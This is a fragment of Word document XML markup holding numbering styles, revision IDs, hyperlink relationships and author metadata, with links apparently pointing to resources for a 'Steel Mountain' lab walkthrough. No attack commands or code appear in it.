      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="254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26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8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70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2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4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6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8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308" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1350134879">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1571648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99D"/>
    <w:rsid w:val="00013C70"/>
    <w:rsid w:val="00017A6D"/>
    <w:rsid w:val="00036E91"/>
    <w:rsid w:val="000628C4"/>
    <w:rsid w:val="00084FBA"/>
    <w:rsid w:val="000C2306"/>
    <w:rsid w:val="000D64E2"/>
    <w:rsid w:val="000E399D"/>
    <w:rsid w:val="000E4DC6"/>
    <w:rsid w:val="000F3E8D"/>
    <w:rsid w:val="00100B1A"/>
    <w:rsid w:val="001369AF"/>
    <w:rsid w:val="001411B7"/>
    <w:rsid w:val="00142897"/>
    <w:rsid w:val="0015284A"/>
    <w:rsid w:val="00152D4F"/>
    <w:rsid w:val="001545B8"/>
    <w:rsid w:val="00155B86"/>
    <w:rsid w:val="001966F8"/>
    <w:rsid w:val="001A4022"/>
    <w:rsid w:val="001A6394"/>
    <w:rsid w:val="001D4427"/>
    <w:rsid w:val="001E64AA"/>
    <w:rsid w:val="001F3106"/>
    <w:rsid w:val="00204D7C"/>
    <w:rsid w:val="00224E73"/>
    <w:rsid w:val="002275FD"/>
    <w:rsid w:val="0024732C"/>
    <w:rsid w:val="00275AF8"/>
    <w:rsid w:val="0029449C"/>
    <w:rsid w:val="0030317D"/>
    <w:rsid w:val="00305E0F"/>
    <w:rsid w:val="00354E6A"/>
    <w:rsid w:val="00380F72"/>
    <w:rsid w:val="003865E5"/>
    <w:rsid w:val="003C1A73"/>
    <w:rsid w:val="003E2E8D"/>
    <w:rsid w:val="004655CC"/>
    <w:rsid w:val="00467DA8"/>
    <w:rsid w:val="0047410C"/>
    <w:rsid w:val="004A4C4A"/>
    <w:rsid w:val="0051205E"/>
    <w:rsid w:val="00515CAA"/>
    <w:rsid w:val="00547A58"/>
    <w:rsid w:val="005709B1"/>
    <w:rsid w:val="005968F8"/>
    <w:rsid w:val="005C6620"/>
    <w:rsid w:val="005C7E4E"/>
    <w:rsid w:val="005E316D"/>
    <w:rsid w:val="006B136B"/>
    <w:rsid w:val="006D36E8"/>
    <w:rsid w:val="006E2F3B"/>
    <w:rsid w:val="006F5102"/>
    <w:rsid w:val="007037F7"/>
    <w:rsid w:val="00715EEA"/>
    <w:rsid w:val="007315EB"/>
    <w:rsid w:val="007C36E7"/>
    <w:rsid w:val="007E12A0"/>
    <w:rsid w:val="0081300C"/>
    <w:rsid w:val="00831145"/>
    <w:rsid w:val="008431F4"/>
    <w:rsid w:val="00855BA9"/>
    <w:rsid w:val="00910742"/>
    <w:rsid w:val="00970427"/>
    <w:rsid w:val="00976FCB"/>
    <w:rsid w:val="009A29D4"/>
    <w:rsid w:val="009A48F4"/>
    <w:rsid w:val="009D4D2C"/>
    <w:rsid w:val="009F5D7E"/>
    <w:rsid w:val="00A34C48"/>
    <w:rsid w:val="00A36C7E"/>
    <w:rsid w:val="00A414AB"/>
    <w:rsid w:val="00AA63DA"/>
    <w:rsid w:val="00AE5AB4"/>
    <w:rsid w:val="00AF0DF5"/>
    <w:rsid w:val="00B065EC"/>
    <w:rsid w:val="00B208F0"/>
    <w:rsid w:val="00B2205F"/>
    <w:rsid w:val="00B243B2"/>
    <w:rsid w:val="00B329E3"/>
    <w:rsid w:val="00B77395"/>
    <w:rsid w:val="00B820DE"/>
    <w:rsid w:val="00BF2187"/>
    <w:rsid w:val="00C13D60"/>
    <w:rsid w:val="00C155B6"/>
    <w:rsid w:val="00C93440"/>
    <w:rsid w:val="00CA6557"/>
    <w:rsid w:val="00CA7754"/>
    <w:rsid w:val="00CB60D2"/>
    <w:rsid w:val="00D13EAD"/>
    <w:rsid w:val="00D31C34"/>
    <w:rsid w:val="00D50C89"/>
    <w:rsid w:val="00D717EF"/>
    <w:rsid w:val="00DA4039"/>
    <w:rsid w:val="00DC379E"/>
    <w:rsid w:val="00DE3811"/>
    <w:rsid w:val="00DE45F2"/>
    <w:rsid w:val="00E266FC"/>
    <w:rsid w:val="00E36D9B"/>
    <w:rsid w:val="00E41778"/>
    <w:rsid w:val="00E555CF"/>
    <w:rsid w:val="00E56ED2"/>
    <w:rsid w:val="00E70794"/>
    <w:rsid w:val="00E7431E"/>
    <w:rsid w:val="00EA3B01"/>
    <w:rsid w:val="00EA663E"/>
    <w:rsid w:val="00EC3602"/>
    <w:rsid w:val="00EE21C7"/>
    <w:rsid w:val="00EF2A1D"/>
    <w:rsid w:val="00EF7FF5"/>
    <w:rsid w:val="00F10604"/>
    <w:rsid w:val="00F2422B"/>
    <w:rsid w:val="00F5050C"/>
    <w:rsid w:val="00F76685"/>
    <w:rsid w:val="00F83E8C"/>
    <w:rsid w:val="00F8540A"/>
    <w:rsid w:val="00FE0817"/>
    <w:rsid w:val="00FF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868EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2359CF8-1A94-45EF-A0E1-6203271D7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0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40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0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6FCB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5D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5D7E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9F5D7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F3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ertcube.com/powerup-cheatshe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ertcube.com/powerup-cheatshee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ploit-db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log.razrsec.uk/steel-mountain-walkthrough/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/3916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4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Vu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alex Vu</cp:lastModifiedBy>
  <cp:revision>123</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-02T22:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T04:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>